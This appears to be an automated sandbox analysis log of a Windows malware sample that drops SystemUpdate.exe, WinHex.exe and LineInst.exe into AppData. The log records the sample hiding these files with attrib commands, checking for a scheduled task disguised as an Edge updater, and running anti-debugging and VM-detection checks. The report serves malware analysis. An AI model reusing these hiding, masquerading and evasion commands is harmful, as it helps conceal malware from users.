Source: C:\Windows\System32\svchost.exe TID: 7140Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_bios
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\WinHex.exeLast function: Thread delayed
Source: C:\Users\user\AppData\WinHex.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\WinHex.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6746714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6737820 FindFirstFileExW,FindClose,0_2_00007FF7A6737820
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6746714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67509B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7A67509B4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,12_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,12_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BD7820 FindFirstFileExW,FindClose,12_2_00007FF7C5BD7820
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF09B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7C5BF09B4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FFD75 memset,SetLastError,GetLastError,FindFirstFileW,memset,wcsrchr,SetLastError,SetLastError,CompareStringW,CompareStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,memset,FindNextFileW,GetLastError,GetLastError,GetLastError,FindClose,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetLastError,SetLastError,13_2_004FFD75
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00544EA0 FindFirstFileW,13_2_00544EA0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657806714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,19_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577F7820 FindFirstFileExW,FindClose,19_2_00007FF6577F7820
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657806714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,19_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578109B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00007FF6578109B4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00544D90 GetLogicalDriveStringsW,13_2_00544D90
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053DC8E GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,13_2_0053DC8E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: SetupHost.exe, 0000000D.00000003.1830014011.000000000336F000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1830551063.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.000000000336D000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1830551063.0000000003375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: SetupHost.exe, 0000000D.00000003.1830551063.000000000339E000.00000004.00000020.00020000.00000000.sdmp, SetupHost.exe, 0000000D.00000003.1831757047.000000000339E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH|;
Source: SetupHost.exe, 0000000D.00000003.1797347208.000000000339F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7A673B69C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053DE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey,13_2_0053DE32
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005020B8 mov eax, dword ptr fs:[00000030h]13_2_005020B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005020B8 mov eax, dword ptr fs:[00000030h]13_2_005020B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005020B8 mov eax, dword ptr fs:[00000030h]13_2_005020B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005020B8 mov eax, dword ptr fs:[00000030h]13_2_005020B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005041C5 mov eax, dword ptr fs:[00000030h]13_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005041C5 mov eax, dword ptr fs:[00000030h]13_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005041C5 mov eax, dword ptr fs:[00000030h]13_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051A1B0 mov eax, dword ptr fs:[00000030h]13_2_0051A1B0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050D284 mov eax, dword ptr fs:[00000030h]13_2_0050D284
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005023C9 mov eax, dword ptr fs:[00000030h]13_2_005023C9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501452 mov eax, dword ptr fs:[00000030h]13_2_00501452
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502459 mov eax, dword ptr fs:[00000030h]13_2_00502459
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051B40B mov eax, dword ptr fs:[00000030h]13_2_0051B40B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051B40B mov eax, dword ptr fs:[00000030h]13_2_0051B40B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502486 mov eax, dword ptr fs:[00000030h]13_2_00502486
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005035EB mov eax, dword ptr fs:[00000030h]13_2_005035EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005035EB mov eax, dword ptr fs:[00000030h]13_2_005035EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005035EB mov eax, dword ptr fs:[00000030h]13_2_005035EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005015EF mov eax, dword ptr fs:[00000030h]13_2_005015EF
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504603 mov eax, dword ptr fs:[00000030h]13_2_00504603
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504603 mov eax, dword ptr fs:[00000030h]13_2_00504603
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FF6D6 mov eax, dword ptr fs:[00000030h]13_2_004FF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FF6D6 mov ecx, dword ptr fs:[00000030h]13_2_004FF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FF75B mov eax, dword ptr fs:[00000030h]13_2_004FF75B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501774 mov eax, dword ptr fs:[00000030h]13_2_00501774
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F723 mov eax, dword ptr fs:[00000030h]13_2_0051F723
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051E7B9 mov eax, dword ptr fs:[00000030h]13_2_0051E7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051E7B9 mov eax, dword ptr fs:[00000030h]13_2_0051E7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051E7B9 mov eax, dword ptr fs:[00000030h]13_2_0051E7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051E7B9 mov eax, dword ptr fs:[00000030h]13_2_0051E7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov ecx, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00503859 mov eax, dword ptr fs:[00000030h]13_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F942 mov eax, dword ptr fs:[00000030h]13_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502960 mov eax, dword ptr fs:[00000030h]13_2_00502960
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501913 mov eax, dword ptr fs:[00000030h]13_2_00501913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501913 mov eax, dword ptr fs:[00000030h]13_2_00501913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501913 mov eax, dword ptr fs:[00000030h]13_2_00501913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005049F4 mov eax, dword ptr fs:[00000030h]13_2_005049F4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051BA64 mov eax, dword ptr fs:[00000030h]13_2_0051BA64
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FFA04 mov eax, dword ptr fs:[00000030h]13_2_004FFA04
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FFA04 mov eax, dword ptr fs:[00000030h]13_2_004FFA04
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504AD3 mov eax, dword ptr fs:[00000030h]13_2_00504AD3
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051BACF mov eax, dword ptr fs:[00000030h]13_2_0051BACF
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00506B97 mov eax, dword ptr fs:[00000030h]13_2_00506B97
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502B85 mov eax, dword ptr fs:[00000030h]13_2_00502B85
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov ecx, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB0 mov eax, dword ptr fs:[00000030h]13_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00516BB5 mov eax, dword ptr fs:[00000030h]13_2_00516BB5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501CC2 mov eax, dword ptr fs:[00000030h]13_2_00501CC2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501CC2 mov eax, dword ptr fs:[00000030h]13_2_00501CC2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00516CC6 mov eax, dword ptr fs:[00000030h]13_2_00516CC6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504CA4 mov eax, dword ptr fs:[00000030h]13_2_00504CA4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504CA4 mov eax, dword ptr fs:[00000030h]13_2_00504CA4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00500DBA mov eax, dword ptr fs:[00000030h]13_2_00500DBA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00500DBA mov eax, dword ptr fs:[00000030h]13_2_00500DBA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504E74 mov eax, dword ptr fs:[00000030h]13_2_00504E74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504E74 mov eax, dword ptr fs:[00000030h]13_2_00504E74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501E6D mov eax, dword ptr fs:[00000030h]13_2_00501E6D
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501E1A mov eax, dword ptr fs:[00000030h]13_2_00501E1A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501E1A mov eax, dword ptr fs:[00000030h]13_2_00501E1A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FEE2E mov eax, dword ptr fs:[00000030h]13_2_004FEE2E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501EFB mov eax, dword ptr fs:[00000030h]13_2_00501EFB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504F73 mov eax, dword ptr fs:[00000030h]13_2_00504F73
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00504F73 mov eax, dword ptr fs:[00000030h]13_2_00504F73
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67525A0 GetProcessHeap,0_2_00007FF7A67525A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673B880 SetUnhandledExceptionFilter,0_2_00007FF7A673B880
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7A673AE00
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A673B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7A673B69C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6749AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7A6749AE4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BDB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7C5BDB69C
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BDAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7C5BDAE00
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BDB880 SetUnhandledExceptionFilter,12_2_00007FF7C5BDB880
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE9AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7C5BE9AE4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053F60E memset,memset,memset,memset,memset,memset,memset,memset,GetLastError,GetWindowsDirectoryA,ExpandEnvironmentStringsW,GetFileAttributesW,GetTempPathW,wcsrchr,SetUnhandledExceptionFilter,GetCurrentProcessId,GetLastError,RtlAddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,13_2_0053F60E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054010D SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,TlsFree,TlsGetValue,TlsFree,EnterCriticalSection,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LeaveCriticalSection,13_2_0054010D
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054EB2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0054EB2C
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577FB880 SetUnhandledExceptionFilter,19_2_00007FF6577FB880
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577FB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF6577FB69C
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577FAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6577FAE00
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657809AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF657809AE4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exeJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web Jump to behavior
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exeJump to behavior
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
